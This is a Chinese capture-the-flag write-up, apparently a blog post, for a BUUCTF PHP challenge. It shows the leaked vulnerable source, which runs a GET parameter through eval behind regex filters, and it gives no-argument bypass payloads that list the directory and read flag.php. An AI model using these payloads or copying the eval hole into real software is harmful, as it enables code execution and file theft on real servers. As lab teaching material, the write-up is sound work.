wp-buuctf-禁止套娃(无参绕过)【多方法】

wp

在这里插入图片描述
一开始没看到什么东西,那就开始找吧,常用备份,robots协议,目录爆破,git泄露慢慢试。
试了下git泄露,有东西了:
在这里插入图片描述
打开得到的index.php,源码如下:

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

非常明显的命令执行加waf
现在就是绕waf了。

这里正则表达式很多。推荐大家用正则自动化工具,第一个if把伪协议相关读取给禁止掉。
第二个if规定是带括号无参才能执行,就是这种:
在这里插入图片描述
在这里插入图片描述
所以,这里的关键就是无参。
如果是 scandir(.) 就可以扫描当前目录了,就差一个点。那么用相关函数来返回出一个点就可以了。

localeconv()

在这里插入图片描述
这个数组的第一个值是一个.

current()

在这里插入图片描述
用它来返回当前值,数组一开始肯定是指头嘛,就能够取出第一个值–.

payload1:

?exp=print_r(scandir(current(localeconv())));

在这里插入图片描述
看到flag了。

payload2

取出数组值,在current()中提到了next(),next能够指向下一元素,但是在这里是不能嵌套使用的,因为是对一个数组对象进行next操作,返回下一指针后我们当然不能对返回值进行next操作。

除非我们可以一直对数组变量操作。这里不太现实。

不过这也就是说我们可以有一次移动机会,关键就在这里,虽然正序仅移动一次不能看到flag.php,但是我们可以逆序后移动一次拿到flag.php

所以,payload2:

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

当然你也可以使用show_source()current()也可以换成pos()

在这里插入图片描述

其他解法

使用session来完成,如果你不是很了解session的话,可以看这个:

Session工作机制

这里也非常巧妙,因为session_start()是仅返回true的,所以也是一个无参构造
在这里插入图片描述
接下来把它取出来即可。
在这里插入图片描述
也能得到flag,不过需要你对session有熟悉的了解。

posted @ 2022-03-22 21:47  Sayo-NERV  阅读(133)  评论(0编辑  收藏  举报